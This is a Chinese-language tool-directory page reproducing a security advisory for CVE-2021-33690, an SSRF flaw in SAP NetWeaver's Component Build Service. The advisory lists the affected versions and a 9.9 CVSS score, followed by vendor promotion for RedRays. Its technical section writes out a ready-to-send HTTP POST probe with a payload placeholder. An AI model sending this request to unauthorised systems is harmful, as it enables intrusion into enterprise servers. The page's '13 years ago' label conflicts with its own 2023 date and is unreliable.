Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-33690 — [CVE-2021-33690] SAP NetWeaver Development Infrastructure 中的服务器端请求伪造漏洞 | Kitploit
工具/GitHubGitHub/redrays-io/cve-2021-33690
侦察漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubredrays-io/cve-2021-33690

CVE-2021-33690

[CVE-2021-33690] SAP NetWeaver Development Infrastructure 中的服务器端请求伪造漏洞

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2021-33690

[CVE-2021-33690] SAP NetWeaver 开发基础设施中的服务端请求伪造漏洞

root@kitploit:~
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

公告信息 标题:[CVE-2021-33690] SAP NetWeaver 开发基础设施中的服务端请求伪造漏洞 风险等级:严重 公告 URL:https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/ 发布日期:2023 年 6 月 1 日

漏洞信息 可远程利用:是 可本地利用:否

CVSS 信息 CVSS v3.1 基础评分:9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

漏洞描述 在 SAP NetWeaver 开发基础设施组件构建服务的多个版本(7.11、7.20、7.30、7.31、7.40 和 7.50)中,发现了一个名为服务端请求伪造(SSRF)的漏洞。SAP NetWeaver 开发基础设施组件构建服务中的这一弱点,使具有服务器访问权限的攻击者能够通过特制查询执行代理攻击。此类攻击的后果可能导致敏感服务器数据完全泄露,影响其可用性。需要特别注意的是,该漏洞的严重程度取决于 SAP NetWeaver 开发基础设施(NWDI)是在内网还是互联网上运行。CVSS 评分基于最坏情况计算,即假定其在线上运行。

技术描述

要确定服务器是否存在 SSRF 漏洞,请发送以下请求:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1 Host: redrayssap:50000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

如果收到以下响应,则表明该漏洞存在:

Could not connect to the CBS.

关于 RedRays RedRays 是一家顶尖的网络安全企业,致力于保护 ERP 系统免受内部欺诈活动和外部网络威胁的侵害。我们为依赖 SAP、Oracle 和 Microsoft 等主要 ERP 系统的大型企业和托管服务提供商提供强大的安全解决方案,并为此深感自豪。我们利用先进的工具和策略,主动监督并控制全球范围内大规模 SAP 环境的安全。

我们的首要目标是从技术和业务两个角度弥合安全鸿沟,确保客户业务的顺畅运行,并保护其宝贵的数据。RedRays 致力于恪守顶级安全标准,同时提供卓越的客户服务与支持。

关于 RedRays 研发部门 RedRays 成就的基石在于我们的研发(R&D)部门,该部门专门研究和分析关键企业应用中的漏洞。我们的研发项目已获得 SAP、Oracle、Microsoft Dynamics 和 IBM 等领先软件公司的认可与赞赏。这种对研究的执着使我们能够预见新兴威胁,并打造满足客户需求的定制安全解决方案。

我们的团队由经验丰富的专业人士组成,技能涵盖多个安全领域,如漏洞评估、渗透测试、事件管理和威胁情报。我们致力于开展严谨的研究,并提供前沿的解决方案,以强化 SAP 系统抵御不断变化的威胁。

联系 RedRays

如有任何疑问或需要了解更多详情,请随时联系我们:

  • GitHub
  • 电子邮件
  • 网站
下载工具